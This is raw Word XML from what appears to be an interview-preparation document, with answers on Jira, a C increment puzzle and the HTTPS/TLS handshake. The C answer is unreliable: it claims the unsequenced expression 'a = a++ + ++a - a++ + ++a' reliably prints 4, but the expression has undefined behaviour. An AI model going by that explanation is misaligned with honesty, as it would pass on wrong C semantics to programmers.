    </w:p>
    <w:p w14:paraId="3B08B58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orkflows</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Customizable workflows define the lifecycle of an issue, e.g., from "To Do" to "Done."</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58283E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oards</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Visual representations of issues (Scrum or Kanban boards) to track progress and statuses.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AEDD64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rints</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Agile sprints are used for planning short, time-boxed periods in which work is completed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3141F66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pics and Stories</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Epics are large features or work units, while stories represent smaller, actionable pieces of work that can be completed in a sprint.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A967F05"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dvantages of Using Jira:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A93C61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ntralized Tracking</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Everything from tasks to bugs to user stories can be tracked in one place.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62237A6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facilitates communication between team members, leading to faster issue resolution and better coordination.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="061BD30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Agile and Scrum Support</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Jira supports Agile methodologies, making it an excellent choice for teams following Scrum or Kanban.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="747AA46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ble and Scalable</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Jira is flexible enough for different types of projects, from small teams to large enterprises.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2002EC5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prehensive Reporting</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: With built-in reports, teams can assess their progress and performance over time.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B31EAD3"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50A67FC"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3842" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="504CD394" w14:textId="74E38F56" w:rsidR="004B26C3" w:rsidRPr="00CE4B95" w:rsidRDefault="000C4AEC">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="946" w:name="_Toc197868160"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>What is the output of below program</w:t>
      </w:r>
      <w:r w:rsidR="004B26C3" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="946"/>
    </w:p>
    <w:p w14:paraId="36A1044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880000"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>#include</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="008800"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>&lt;stdio.h&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A2D734D"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p>
    <w:p w14:paraId="1CAD3F92"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3D6C7B6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C74DE7"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p>
    <w:p w14:paraId="4A0459D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23F6FBB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print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5523BCA6"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1450FC2C" w14:textId="223D4844"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606D2542" w14:textId="13C316D7" w:rsidR="00902750" w:rsidRPr="00617E2C" w:rsidRDefault="00902750"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the given C program, the expression used for the variable a can be a bit tricky due to the usage of the post-increment (a++) and pre-increment (++a) operators. Let's break it down:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="563B4C56"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he code:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BEC66A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clude&lt;stdio.h&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="772A94E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t main()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="379EDD93"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4A715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t a = 0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78FE815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1 + 1 - 1 + 1;  // This expression does nothing because the result is not assigned to any variable.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56B5FB4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 = a++ + ++a - a++ + ++a;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E7647B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rintf("%d\n", a);  // This will print the value of 'a' after the expression is evaluated.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AAAC8D2"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turn 0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44E6EBB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9EEAE7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Understanding the expression:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04A8E2C8"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expression:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E10BF5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a++ + ++a - a++ + ++a;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="438843C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volves post-increment (a++) and pre-increment (++a), which can sometimes cause confusion. Here's how these operators work:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D9D938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st-increment (a++)</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: This returns the value of a, then increments a by 1.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="013127D1"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increment (++a)</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: This increments a first, then returns the incremented value.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55D12FE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let's break it down step-by-step:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="552691F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itial value</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: a = 0.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43BBBEF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rst a++</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="149A406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value of a is returned as 0, and then a is incremented to 1.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CA5A97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0, and a becomes 1.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A63830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56A6E8AE"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1. With ++a, a is incremented to 2 first, and then the value 2 is used in the expression.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C393127"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ond a++</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="191F8C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2. The value of a is returned as 2, and then a is incremented to 3.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A4F4AC4"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2, and a becomes 3.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EF4224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76D51A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3. With ++a, a is incremented to 4 first, and then the value 4 is used in the expression.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="685806FA"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Putting it all together:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14109E6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 + 4;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C9AB43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calculating this step-by-step:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3601263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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="652392D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2 - 2 = 0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20C66A2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4 = 4;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76E223CA"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o, the final value of a is 4.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C83F83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utput:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DD71FBD"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program will print:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50E97E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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000D4534" w14:textId="2857A44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3843" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="59F20E23" w14:textId="35A0D3AD" w:rsidR="004B26C3" w:rsidRPr="00CE4B95" w:rsidRDefault="002B5B56">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="947" w:name="_Toc197868161"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>What is https protocol</w:t>
      </w:r>
      <w:r w:rsidR="004B26C3" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="947"/>
    </w:p>
    <w:p w14:paraId="2CC9B1E1" w14:textId="71B1C224" w:rsidR="000368AD" w:rsidRPr="00617E2C" w:rsidRDefault="000368A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 of HTTPS:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00C5BD2E"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xml:space="preserve">: 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HTTPS ensures that the data sent and received has not been altered in transit. This prevents man-in-the-middle attacks, where malicious actors could manipulate data while it's being transmitted.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76332D19"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1308DBA3"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When a user connects to a website via HTTPS, a process called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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55DEAB45"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and server agree on a secure connection method and exchange encryption keys.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A5D529A"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prove its identity.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4936C44C"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verifies the server's certificate against trusted Certificate Authorities (CAs).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55157618"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valid, a secure encrypted connection is established.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3360526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ed Communication</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Once the handshake is complete, all data between the client and server is encrypted using symmetric encryption (where both parties share the same encryption key).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11472C6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URL</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: Websites that use HTTPS start their URLs with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nstead of "http://". In modern browsers, a padlock symbol next to the URL further indicates a secure connection.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="727EB76A"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s HTTPS Important?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="024F5B7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It protects against eavesdropping and data manipulation, ensuring that the information exchanged is private and authentic.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3974A4B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Users are more likely to trust websites that use HTTPS, as they know their data is secure.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AE0F5ED"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r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Major search engines like Google give preference to HTTPS-enabled websites, which can improve search engine ranking.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33475AF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gal Compliance</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: For websites handling sensitive data, HTTPS may be required to comply with regulations like GDPR, HIPAA, and PCI-DSS.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="537995B6"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7A715B1A"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3844" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="66264991" w14:textId="503CB0DE" w:rsidR="004B26C3" w:rsidRPr="00CE4B95" w:rsidRDefault="002B5B56">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="948" w:name="_Toc197868162"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>How does https internally work</w:t>
      </w:r>
      <w:r w:rsidR="004B26C3" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="948"/>
    </w:p>
    <w:p w14:paraId="13B1D157" w14:textId="73DF7BC3"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Hypertext Transfer Protocol Secure) works by combining two essential components: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the protocol for transferring data over the web) and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the protocols for encrypting and securing the communication). Here's a detailed breakdown of how HTTPS works internally:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27B8A7C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SL/TLS Handshake Process:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72089D4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ore of HTTPS security is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which establishes a secure connection between the client (usually a browser) and the server. It ensures that both parties agree on encryption methods and can securely exchange data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F87C5C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s involved in the SSL/TLS handshake:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26BA3FE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1: Client Hello</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="523148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sends a request to the server to start a secure session. This includes:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47A9902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SSL/TLS versions (e.g., TLS 1.2, TLS 1.3)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F0B0FEA"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cipher suites (encryption algorithms)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="766E5A3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used for encryption</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="028925B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2: Server Hello</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="627896A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erver responds to the client with:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47384ED9"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SL/TLS version and cipher suite that will be used</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5635C4E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for encryption</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67D0C017"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containing its public key)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E6626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3: Certificate Validation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FD41EF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checks the server’s certificate to ensure:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47B4923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ssued by a trusted </w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Certificate Authority (CA)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75593EE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s valid and not expired</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BD04E8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matches the domain being accessed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0162A7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client proceeds to the next step. If not, it will show a warning or error message (e.g., "Connection is not secure").</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40D30E8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4: Key Exchange</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BE1B37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generates a </w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>pre-master secret</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (a random number) and encrypts it with the server’s </w:t>
      </w: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 xml:space="preserve"> (from the SSL certificate).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CAF317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sends this encrypted pre-master secret to the server.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0809ED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ly the server can decrypt the pre-master secret using its private key, which is known only to the server.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FE3CCA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5: Session Keys Generation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="612FABB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oth the client and the server independently generate a </w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>session key</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> from the pre-master secret.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CDA6A9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is used for symmetric encryption, ensuring faster and more efficient data transfer compared to asymmetric encryption (public/private key pairs).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6238BD2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6: Client Finished</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35BE9E1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form the server that the client has successfully set up a secure session.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CC3FFB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7: Server Finished</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="363713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also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dicate that the server has successfully established the secure session.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A067D0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ce this handshake process is completed, both the client and the server have the same session key. This session key is used to encrypt and decrypt all data exchanged during the session.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65F7E84F"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CC9DA">
          <v:rect id="_x0000_i3845" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="72980C51"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ed Communication:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E1D75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the SSL/TLS handshake:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B37C68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subsequent data transmitted between the client and server is encrypted using </w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>symmetric encryption</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (where both parties use the same key for encryption and decryption).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05C75B9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data is securely transmitted through the encrypted connection, preventing any third party from reading or modifying the data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C10AA8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mmetric Encryption:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="366C047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ES</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Advanced Encryption Standard) is typically used for symmetric encryption.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68F4453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shared between the client and server, encrypts/decrypts the data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E11003C"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8A2AF">
          <v:rect id="_x0000_i3846" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D42FE2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Data Integrity:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E1CD77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e Authentication Codes (MACs)</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: To ensure data integrity, both the client and server use a MAC to verify that the data hasn’t been tampered with during transmission.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7383AE9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data is altered or corrupted during transmission, the MAC verification will fail, and the connection will be terminated.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DCE1BC5"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960265">
          <v:rect id="_x0000_i3847" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="070C1588"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ession Termination:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75A2C8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en the session is finished:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00EE70D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ither the client or the server can send a </w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>"close_notify"</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> alert to indicate the end of the communication.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="566B60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onnection is then closed, and any session keys are discarded to ensure that no data can be decrypted after the session ends.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="705D9AF7"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6A90B">
          <v:rect id="_x0000_i3848" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="520EFB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HTTPS:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23DAF98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The server’s public key is part of a digital certificate issued by a trusted Certificate Authority (CA). The certificate includes the public key and details about the server’s identity.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22A3F21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te Key</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: The server keeps a private key that corresponds to the public key in the certificate. This private key is used to decrypt the pre-master secret sent by the client.</w:t>
